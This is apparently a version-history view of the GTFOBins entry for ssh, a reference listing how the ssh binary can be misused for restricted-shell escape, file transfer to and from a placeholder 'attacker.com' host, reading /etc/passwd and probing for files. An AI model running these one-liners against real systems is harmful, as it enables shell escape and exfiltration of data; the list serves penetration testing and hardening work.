GTFOBins.github.io/_gtfobins/ssh.md

27 lines
857 B
Markdown
Raw Normal View History

2018-05-21 21:14:41 +02:00
---
functions:
2018-05-25 15:30:02 +02:00
execute-interactive:
2018-05-21 21:14:41 +02:00
- description: Reconnecting may help bypassing restricted shells.
code: ssh localhost /bin/bash --noprofile --norc
download:
- description: Fetch a remote file from a SSH server.
code: |
2018-05-24 21:59:21 +02:00
HOST=user@attacker.com
2018-05-21 21:14:41 +02:00
RPATH=file_to_get
LPATH=where_to_save
ssh $HOST "cat $RPATH" > $LPATH
upload:
- description: Send local file to a SSH server.
code: |
2018-05-24 21:59:21 +02:00
HOST=user@attacker.com
2018-05-21 21:14:41 +02:00
RPATH=where_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH
2018-05-28 09:44:53 +02:00
read file:
- description: Read strings from text files. Reliability depends on content of files but works well with /etc/passwd
code: ssh -F /etc/passwd localhost
file exists:
- description: Tests whether a file exists.
code: ssh -i /filename localhost
2018-05-21 21:14:41 +02:00
---